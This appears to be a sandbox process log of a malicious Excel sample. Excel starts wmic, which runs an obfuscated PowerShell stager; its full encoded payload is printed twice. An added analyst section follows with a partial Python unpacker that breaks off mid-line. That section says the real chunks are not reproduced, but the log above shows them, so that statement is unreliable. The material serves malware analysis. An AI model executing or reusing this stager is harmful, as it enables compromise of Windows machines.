c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\winspool.drv
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\winmm.dll

PID
3964
CMD
wMIc PROcEsS 'Call' CrEaTe "POWershelL -w 1 -eXeCutIonpoLIC bYpAss -NOninTeRA -NopRoFi -cOmmA sV P1LJ ( [StRing][ChAr]44 ) ; "\".("\" +[StrInG][CHAR]34 +"\"{1}{0}"\" +[StrInG][CHAR]34 +"\"-f'l'${P1LJ}'sa') l sal;.('l') t NEw-Object;&('l') k IeX;.('k')(&('t') Io.COmPRESSion.deFLATeSTreaM( [SyStEm.io.mEmOrYSTrEam] [cOnVErT]::FRoMBASe64sTrING(("\" +[StrInG][CHAR]34 +"\"{123}{20}{33}{17}{35}{103}{144}{89}{120}{124}{30}{116}{53}{4}{76}{25}{8}{84}{64}{71}{61}{107}{113}{95}{10}{57}{72}{93}{34}{125}{13}{127}{44}{49}{63}{28}{36}{12}{126}{98}{94}{115}{100}{88}{22}{39}{101}{131}{51}{32}{38}{77}{66}{37}{75}{56}{47}{112}{73}{130}{128}{52}{79}{5}{7}{15}{85}{132}{150}{121}{26}{147}{140}{43}{151}{109}{90}{118}{3}{70}{141}{91}{16}{41}{143}{45}{110}{74}{40}{31}{27}{78}{11}{59}{14}{119}{9}{21}{102}{117}{48}{60}{69}{97}{55}{29}{24}{142}{50}{114}{87}{139}{138}{67}{96}{148}{133}{149}{68}{42}{122}{2}{6}{137}{92}{19}{86}{23}{134}{108}{99}{145}{111}{104}{136}{129}{80}{58}{54}{46}{1}{81}{135}{105}{0}{18}{83}{146}{62}{82}{65}{106}"\" +[StrInG][CHAR]34 +"\" 
1LJ}'4PndanggOs'${P1LJ}'dgNb60HSGCzUsegUaz606Qvk'${P1LJ}'+16eAuhhiWuLbN7azlTHWtE1f2uLKO43ClerRp4ealzUtpbIspzjStfj60rc1HaXtJV+lbLHJe'${P1LJ}'n'${P1LJ}'v0HgRjbVAhcB/HEnufjty3TDa1YcPRbameULFZ18eWW5wyzzNL82ut+OvJRx9kVg+S'${P1LJ}'o7F1rrvkFVSHMjc0aIpUA62v8Z0rCfGEvjuad4Dg'${P1LJ}'YQF5FElH0sCLG7hlsIjAck7GuVo7ONcdHiiRxCxGg26eSh'${P1LJ}'GwzhWpfg95fIaSOo7'${P1LJ}'n8fGN0icbm/Afpb1Rk+zTIu1Jw'${P1LJ}'+nzi')) ${P1LJ}[iO.cOMPReSSion.coMPrESSioNMODe]::deCOmpReSs ) |.('%'){ &('t') Io.StReamREaDer( `$_${P1LJ} [TexT.eNCODINg]::AScii)}|&('%'){ `$_.READtoeND( )} )"\" | . ( $PShOme[4]+$PshOME[30]+'X')"
Path
C:\Windows\System32\Wbem\wMIc.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
2752
CMD
POWershelL -w 1 -eXeCutIonpoLIC bYpAss -NOninTeRA -NopRoFi -cOmmA sV P1LJ ( [StRing][ChAr]44 ) ; "\".("\" +[StrInG][CHAR]34 +"\"{1}{0}"\" +[StrInG][CHAR]34 +"\"-f'l'${P1LJ}'sa') l sal;.('l') t NEw-Object;&('l') k IeX;.('k')(&('t') Io.COmPRESSion.deFLATeSTreaM( [SyStEm.io.mEmOrYSTrEam] [cOnVErT]::FRoMBASe64sTrING(("\" +[StrInG][CHAR]34 +"\"{123}{20}{33}{17}{35}{103}{144}{89}{120}{124}{30}{116}{53}{4}{76}{25}{8}{84}{64}{71}{61}{107}{113}{95}{10}{57}{72}{93}{34}{125}{13}{127}{44}{49}{63}{28}{36}{12}{126}{98}{94}{115}{100}{88}{22}{39}{101}{131}{51}{32}{38}{77}{66}{37}{75}{56}{47}{112}{73}{130}{128}{52}{79}{5}{7}{15}{85}{132}{150}{121}{26}{147}{140}{43}{151}{109}{90}{118}{3}{70}{141}{91}{16}{41}{143}{45}{110}{74}{40}{31}{27}{78}{11}{59}{14}{119}{9}{21}{102}{117}{48}{60}{69}{97}{55}{29}{24}{142}{50}{114}{87}{139}{138}{67}{96}{148}{133}{149}{68}{42}{122}{2}{6}{137}{92}{19}{86}{23}{134}{108}{99}{145}{111}{104}{136}{129}{80}{58}{54}{46}{1}{81}{135}{105}{0}{18}{83}{146}{62}{82}{65}{106}"\" +[StrInG][CHAR]34 +"\" 
-f'TDcg1+tRAnwivi1'${P1LJ}'gKQGb24OMIdgBE'${P1LJ}'3Wydj4g4f++oScUgUoxmfHuxOKdq0uWhUHUTpb+qNH'${P1LJ}'LlnSVWBKqIIqKYkH/dWg9nJ4twYg1JJhVCUOTgt5X8YEVw1VpuERkSzsOooIxSkEFVJPSrisdaoyAc9'${P1LJ}'S7+cdYuRh10o0Py0ffdpzP3Jn6a6JnX1q2QEK45oM9p/zJ8'${P1LJ}'hBo8oyC0OrY'${P1LJ}'VR9DnaMSwbwz9BUYjq47FDs1Wj8ov8TaXYfoZU4kz0yudrbu1DbA+S7apq4ekJ7'${P1LJ}'Mx7A9MdnFyvU6ngUgST6mQhKBe31CJhjHCpMhNKDa1UItMxX1DiS'${P1LJ}'K+znkbp+nmvnFKOy/31NZcTt75wZnHJ5eVd'${P1LJ}'0w6cHT1GzBEhTxwpwR'${P1LJ}'C3PG'${P1LJ}'Y'${P1LJ}'kOxIVUD2sbydlw1E7FEiIqePymqRCrtVaepI4H'${P1LJ}'+BD'${P1LJ}'4WgVBZJqIl+awi'${P1LJ}'mGQ/yb5ZZZvZh/KO+rfOi0I4oUIUCnieJg/0AviDcd'${P1LJ}'lAD0jT2FRKChrD1X9OBkEAlc14K/QzHh+UAVZhFvEOJl6w3'${P1LJ}'//fjtt5/jmD69POPQr3m++PfM887F53sxt4V/yzx/xrF+5n'${P1LJ}'o'${P1LJ}'v1RfRptK'${P1LJ}'/ym4o+5zGJ7msayeQVoyIwtcSRARTHZGgYBoSNb/d55mp7YH3U'${P1LJ}'EckJmFRKWWKwwaHCTZd8UCnp1LrMquHBOsvtC/QDjDBALyEeAW2bGph34H'${P1LJ}'fjuOfRW'${P1LJ}'hsJEPEFc4n+SW8JErHVMm1r'${P1LJ}'eqJZo'${P1LJ}'hyPOgCCI/'${P1LJ}'aBn'${P1LJ}'sAKq1eYEit/p8DrWXQvlxYQ'${P1LJ}'QdlNu6WbidLaCtukvIadhI3DxE7vnLfCgyMJYz/8BnNlmIvgnPFaroJWG+zWgQozwDPE4qrpU8e9sd/'${P1LJ}'Y52fGqjS1XqXuoU1XSGjUInyIEJSyAJykMGB0yMaUnwNYn8YE4PygVvRn'${P1LJ}'1aY9Vru8q60M1FkvV440GZr'${P1LJ}'mZ62NGzAcuEJS+o9W0hab'${P1LJ}'W3E0qZ2gvfV'${P1LJ}'pVK1mXOMccYc9W'${P1LJ}'MPmp5VNljr5bc1ygkNt0gt6a2c5ZCeFIMoey5Ak0rt'${P1LJ}'mr/SmNN21P6azt0/s'${P1LJ}'pYbNcIcp/PMOgVLhYXczjSC'${P1LJ}'VnT4N3TBp'${P1LJ}'stQWp'${P1LJ}'uClW5E6YLXpBHYWDjec3WVnQsr1WAYM'${P1LJ}'2mMXDjPCb5svVYvQC32fRnuKILIgrXIJ9MPEn8OBCP7GZSqHILJJth/AICvpongM73pfeblbwKMdYCySOKmOXr6l1QTgdYAy10rbQ'${P1LJ}'T3Q1bjk1gTDzWJBMeoYdy+xHoXyRTqKv0IOCivDMseRM5mR2i2C6PJ2x0SCuTKDrhb'${P1LJ}'liixbU3cRSd26x5rior0qMcdv0T0I+FwjuCTs6qcMA4NNsh90vZL6EzlYM9B'${P1LJ}'MdxPRVGAkTJwTb1rAPWGA9gxWjirQphLqHxhyx3beLgB+HL68a5'${P1LJ}'SQ8T1LY3KM0QM/FQbxmvQilZPvuAtcz74g62PvKPLfXblY1pK+XuI/OzuPFobn'${P1LJ}'fvU'${P1LJ}'Lhd1iE30YC6dfuM'${P1LJ}'zwIl/K2vpbe0j8HbpzGG'${P1LJ}'BAgfn2wPZ5poK/rwhf'${P1LJ}'E'${P1LJ}'hNO2LJ0wz'${P1LJ}'Qjyy/Hqw/qRPKeY+18bapFROJY0LwQPhHS+aMHPed
OLPECkap1LqXdlekASSlbx2BKXQP'${P1LJ}'rsiFwqR3fEPWk5DmszturOw0hgtgD'${P1LJ}'vckGox89fIxNp3VzUcf+PRq3s6ancHA3am'${P1LJ}'U4h264VL0'${P1LJ}'JrJEFWs6V4YvzoHOPw5kOFFNDV9hgE8cgIYVVOlpYtZlb92mM1eTewELuCZ4kQLPsQTAccu8'${P1LJ}'XDwFksRG2cWC66T6I+HaJ'${P1LJ}'zfyS82nScXds5ZpkjcP8zyCeAex4kVXLWQIZjDLH8aUQaR'${P1LJ}'UKhDxtYhLtKy'${P1LJ}'Mr6R+fq34IhhCmjFta1hBIbnGLKOxkR3h2zNcMzV'${P1LJ}'0'${P1LJ}'C7vu8/77kz9+U7NuzsPy68BUz++K3wyqeh+8LwzHTnv39'${P1LJ}'4nwUh'${P1LJ}'t5WlzUID7neaz5UfuyZuc'${P1LJ}'6/TH8+o7p1E8e'${P1LJ}'v/rP//jbf71++3lez/3Z12PZfv74/X9+/OV//+Px1+uf/+m3H3/xz3/6l3/49z8P/zWMv//vj99//O'${P1LJ}'CCXQy6RdEVTRKnIH4pje2482y/VdiSVqeWn'${P1LJ}'DAvfCRAt/uzxkDw8zhlRD6RjB+fVrpg0zaMf3yYqepy5rHB'${P1LJ}'DLE4ar+SkehEns0oNegAPjJSnL0xdEvKLVmPezMgI4RHJ'${P1LJ}'aQOqnvJuJZx'${P1LJ}'KDUe3ohYKtVlFPGcWHxsYrbJxVVAK3owbGCGrkkQ/rCZub'${P1LJ}'z+/LMw/3H++WP'${P1LJ}'pTLaCK76XdrBgK2IxT'${P1LJ}'RerDZeZN28GlEnuJo/YmtpE+pq8IL0'${P1LJ}'9gHWgZ'${P1LJ}'40qQDWuRH5wTjp82ITMWtrOUgtMgDauSyL'${P1LJ}'9Pm55II0Gpv'${P1LJ}'4ygMr+JmbTH1DdYySagU9VKc2N0W4ueg08vOw2nhD3mD7rPgIoTp'${P1LJ}'t27p68232sJu1le7aGT0mFqOOtMcrOYiS6tyqQ8wzGG3CeJTFxj6r7uWOF2JmnuCATwsQJJcUrVM6WQUz+J5AUajSqfO/MFZsBQUCjUXw6Nc0TC4NGhldTtK3SB32sUpSra10em3vobWXnEqYhyRmTmcK1g3iqQ4B3mbex'${P1LJ}'J8ou+PsrXwNVZz/hFnkArS9zcdRUC6WP9gIympSM9E1WZIf+9wmkJWTx1S0QHwurtihWwDqsCDg53F5WJ9tUNvuMaj8ab8q'${P1LJ}'skQ0THyQyUjisGjHcYKIQu2+mzue17frRoF4IGBo+DTMitXmC0WhhilDxb5O+R3LjEyZtHg9D'${P1LJ}'77jD95DtT16Tj'${P1LJ}'tbQDc97dhPNrz2Oh2jwdsXZ0DkCcOhOYkdWTEEyuTEm+2aIM46X/KoqDrxavt+vkmQyT4iu+GpqS8PP'${P1LJ}'MArjhRGNYg2F9VfdPa4BqoVHYAkxju0O8J1R4'${P1LJ}'/xOV2JPU7rfD9acPrw7eLf60Hh/H3KIRKandHpnalfO3JV4dvqkdua'${P1LJ}'Z'${P1LJ}'aWcwRJAr6q+ND1TrC'${P1LJ}'qKSY'${P1LJ}'ljPb4xeeFL3DvLcMrADgToT5aLUox5CllA+JXEQMW/bOC17LZal1S/zNa1BdPXO5Yn'${P1LJ}'YlGLa5n3NN4zV/onjR+uM84xtycNJwGJjx/e1'${P1LJ}'C+cNjhgjs/34BpnxC+hIJvyQ4B4RjqblKVZHTc3rAbGM64ZBbb+zzY+XckwZ6OlcLdRbobQidoeXmecN8UzCG++X3fMStA3U9dY0GWN5/vtcnRWXJxugwwTOazOCBDpmJgzhyzH+LFAIuVq8FiUxa9QYwRH'${P1LJ}'0vVgFpa2Dqb60+4DsVhjetBg3Zg7ldJXarU'${P1L
J}'pu'${P1LJ}'7elXIf7joC2nzLIjXD'${P1LJ}'113'${P1LJ}'3H5jY2cnxvY/4jte27oI2XefoVzjsXP7hiUpZQz+8QrOb8Pn/l+v+3G8j5V5'${P1LJ}'fgK'${P1LJ}'L1h9u4oNV+ssq3TkkiNlVN/'${P1LJ}'mngMiT+T16ZyqSTvHBZWOD'${P1LJ}'/hwOl+nzw/HjSN1YOHgKqFpt7rRZGWT/BIiJkyF95SswPDL3pxW7zJDiT4/BO'${P1LJ}'F+kmm9Sj1Kubr0qsBEUpYmKxgI/s03HN7y'${P1LJ}'C6O6QtCbh5ea89M74ka+QdBqHs2q11FMwFGtWqFV1e6HSgtgjeR7lhTr7IqWU'${P1LJ}'BVvidIOK5k4r+WAGmnlxUDDZ+8A'${P1LJ}'5DpV7h623k5v23FYeOeaZf2X1kenm40/rG6OleqdxnxtzlXtuWxrWNG7c9esDZq/nzI0DSznTuMxOl+7WuP1Kk5'${P1LJ}'7XoIbvKvNgn4H/YGe+p'${P1LJ}'xjDEtC82gNa'${P1LJ}'lv/n7/ux8/uev/AA=='${P1LJ}'s+efp89/SktmdfxW0Lq8nD/s'${P1LJ}'G'${P1LJ}'+elVnRyixanAvVNCqUeWr/6qBbTJdR2B'${P1LJ}'QXVMU'${P1LJ}'xmwnTgfsbjzOwolxBVmLrwiAkHRV9m5lHiVtHgqNwTinMuUR0kjvZgSTrbantkN6opXWeotL8uZhGv0FtBuHNYf2clhLCAi+s+UXf3'${P1LJ}'BPMXYpuPdxfWretc6RGXx7Bogz1cr4Y3yqXf'${P1LJ}'dDRPD6znvkdH'${P1LJ}'2COWZo4ll4X'${P1LJ}'oledVOE'${P1LJ}'SWdtZx6vWs6St5U9szY8YgwmSUXh+3c+gmS2STj5ue6yTdS+d6QZvHR6iwUeMunhHrHDMRzOg5'${P1LJ}'rjo/H3SOZT376G3489pmTt+cbx0quZ0lhpVkXWL'${P1LJ}'VdZ8nxoAeDhYxif'${P1LJ}'Ta'${P1LJ}'smpPqleLDVN/N17Y4EDk'${P1LJ}'myREzVBnwx7uDI6MNK7vDoTB/DjoIPMVJFY+WZpkvYW/fFEj1MCdXLkag2FS'${P1LJ}'FEVe3xPIpM8L7FaLMH3d/WJPfFaY6jyYzH2xOrGEMAtVoo/Au3dAf2'${P1LJ}'RZlLy+xaV4X'${P1LJ}'Wn3OHKr158YIH+YhvvT'${P1LJ}'RMFmDDU4H'${P1LJ}'Ftxk1GpFQ1MDW29U5N3LmWU5cjGMuwEbzFklE3vtJBDs345aQXGCMG6pD4FBNEh8hWzmV0s6qUBWxsOaIq+tf4qvRiMCYD51Fm'${P1LJ}'DqUse79TOVvc1k/+Jt'${P1LJ}'Jeg1QkTtO'${P1LJ}'HDZIUxb1Upq5b72'${P1LJ}'ANiT'${P1LJ}'pl6Ab/Ul/Q+8Ni'${P1LJ}'WoMBAq/AzgAC52'${P1LJ}'DYT3xkbXHqQHJxY7RetKDmXLNhGIdncQAhgUI+nPlOJwAh8aVwut2uUFAIazhR+2GXuMwvj7fv1dQ3RCnJ29D5+neGcY+QvoKI4lvHiTpFAkQ+kBDAeBPG43vGSUTyp+C'${P1LJ}'Yb8U0AO'${P1LJ}'pobXQlFYAQZrk7VZCBRx'${P1LJ}'0iKx2qmtGkAJ0mWIHrMo5mCtHPIzRU'${P1LJ}'WB02tamqyBYxBguYwAKG3ODN1FzokGE4G+Na/Lco0TyoaZHEzNYucVD'${P1LJ}'UMjO26uW0kHU'${P1LJ}'K'${P1LJ}'dqLrYJrRtIo2IiY3AjXAw/tYkxoEQbJXMjzOR8cJGvoFXdaFskKgqRtSzQkLG5H'${P1LJ}'EbIbAuWxUgH+SxcIS7/D569BXmIC1mEmXFXUyS0CJhOyOMk0a2mUTrxlw4hK7GzDOwzVTV8HPqs1SvvEB'${P
1LJ}'4PndanggOs'${P1LJ}'dgNb60HSGCzUsegUaz606Qvk'${P1LJ}'+16eAuhhiWuLbN7azlTHWtE1f2uLKO43ClerRp4ealzUtpbIspzjStfj60rc1HaXtJV+lbLHJe'${P1LJ}'n'${P1LJ}'v0HgRjbVAhcB/HEnufjty3TDa1YcPRbameULFZ18eWW5wyzzNL82ut+OvJRx9kVg+S'${P1LJ}'o7F1rrvkFVSHMjc0aIpUA62v8Z0rCfGEvjuad4Dg'${P1LJ}'YQF5FElH0sCLG7hlsIjAck7GuVo7ONcdHiiRxCxGg26eSh'${P1LJ}'GwzhWpfg95fIaSOo7'${P1LJ}'n8fGN0icbm/Afpb1Rk+zTIu1Jw'${P1LJ}'+nzi')) ${P1LJ}[iO.cOMPReSSion.coMPrESSioNMODe]::deCOmpReSs ) |.('%'){ &('t') Io.StReamREaDer( `$_${P1LJ} [TexT.eNCODINg]::AScii)}|&('%'){ `$_.READtoeND( )} )"\" | . ( $PShOme[4]+$PshOME[30]+'X')
Path
C:\Windows\System32\WindowsPowerShell\v1.0\POWershelL.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.jscript\b3fde69f9642ab464bd3389f1fe3c5bd\microsoft.jscript.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\netutils.dll
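
The PowerShell command line above (the same one wmic.exe carries, since wmic passes it through unchanged) is a four-step stager: `sV P1LJ ([String][Char]44)` defines a comma stand-in so that, when the outer double-quoted string is expanded, every `${P1LJ}` becomes `,`; a `"{123}{20}...{106}" -f 'chunk','chunk',...` template puts the shuffled Base64 chunks back in order; the result goes through `[Convert]::FromBase64String`, `IO.Compression.DeflateStream` in `Decompress` mode and a `StreamReader` with ASCII encoding; and the text is piped to `$PSHome[4]+$PSHome[30]+'X'`, which on the sandbox's default `C:\Windows\System32\WindowsPowerShell\v1.0` spells `ieX`. The Python below is an added example, not code from the sample or from ANY.RUN, that performs that unpacking offline. `P1LJ` is the variable name from the page; the `$PSHome` path is assumed to be the Windows 7 default; `deobfuscate`, `build_sample_cmdline` and the other function names are mine, and the payload used for the round trip is constructed (a harmless one-liner), not the report's real chunks, which are not reproduced here.

```python
"""Unpacker for the chunk-shuffling PowerShell launcher captured in this report.

Added example; it reproduces the decoding the launcher performs on itself:
  1. sV P1LJ ([String][Char]44): ${P1LJ} expands to ',' inside the outer "..." string;
  2. "{n}{m}..." -f 'chunk','chunk',... re-orders Base64 chunks;
  3. FromBase64String -> DeflateStream(Decompress) -> StreamReader(ASCII);
  4. the text is piped to $PSHome[4]+$PSHome[30]+'X', i.e. "ieX".
The payload built by build_sample_cmdline is CONSTRUCTED, not the report's real one.
"""
import base64
import random
import re
import zlib

COMMA_VAR = "P1LJ"                                           # variable name used by this sample
PSHOME_WIN7 = r"C:\Windows\System32\WindowsPowerShell\v1.0"  # assumed: default $PSHome on Win7

COMMA_DEF_RE = re.compile(r"\bsV\s+(\w+)\s*\(\s*\[string\]\s*\[char\]\s*44\s*\)", re.I)
TEMPLATE_RE = re.compile(r"(?:\{\d+\}){2,}")                 # a run of -f placeholders


def deflate_b64(text):
    """Raw DEFLATE (no zlib header, as .NET DeflateStream writes it), then Base64."""
    co = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    return base64.b64encode(co.compress(text.encode("ascii")) + co.flush()).decode("ascii")


def inflate_b64(b64):
    """FromBase64String -> DeflateStream(Decompress) -> ASCII, as the launcher does."""
    return zlib.decompress(base64.b64decode(b64), -zlib.MAX_WBITS).decode("ascii")


def resolve_pshome_expr(expr, pshome=PSHOME_WIN7):
    """Evaluate a $PSHome[n]+...+'X' cmdlet-name construction."""
    parts = []
    for idx, lit in re.findall(r"\$pshome\[(\d+)\]|'([^']*)'", expr, re.I):
        parts.append(pshome[int(idx)] if idx else lit)
    return "".join(parts)


def deobfuscate(cmdline):
    """Return the script text that reaches iex, from the captured command line."""
    text = cmdline.replace("\r", "").replace("\n", "")      # the report wraps it mid-token
    m = COMMA_DEF_RE.search(text)
    if not m:
        raise ValueError("comma stand-in (sV NAME ([String][Char]44)) not found")
    text = text.replace("${" + m.group(1) + "}", ",")       # what "..." expansion does at run time
    template = max(TEMPLATE_RE.finditer(text), key=lambda t: t.end() - t.start(), default=None)
    if template is None:
        raise ValueError("no -f template found")
    order = [int(n) for n in re.findall(r"\{(\d+)\}", template.group(0))]
    tail = text[template.end():]
    f_pos = tail.find("-f")
    if f_pos < 0:
        raise ValueError("-f operator missing after template")
    arg_text = tail[f_pos + 2:].split(")", 1)[0]            # Base64 never contains ')'
    chunks = re.findall(r"'([^']*)'", arg_text)
    if sorted(order) != list(range(len(chunks))):           # every chunk used exactly once
        raise ValueError("template indices do not match %d chunks" % len(chunks))
    return inflate_b64("".join(chunks[i] for i in order))


def build_sample_cmdline(script, n_chunks=8, seed=7):
    """CONSTRUCTED stand-in for the captured launcher: same layout, harmless payload."""
    b64 = deflate_b64(script)
    size = -(-len(b64) // n_chunks)                          # ceiling division
    pieces = [b64[i:i + size] for i in range(0, len(b64), size)]
    perm = list(range(len(pieces)))
    random.Random(seed).shuffle(perm)                        # perm[k] = original index in slot k
    args = [pieces[j] for j in perm]
    slot_of = {orig: k for k, orig in enumerate(perm)}
    template = "".join("{%d}" % slot_of[j] for j in range(len(pieces)))
    var = "${" + COMMA_VAR + "}"
    head = ('POWershelL -w 1 -cOmmA sV ' + COMMA_VAR + ' ( [StRing][ChAr]44 ) ; '
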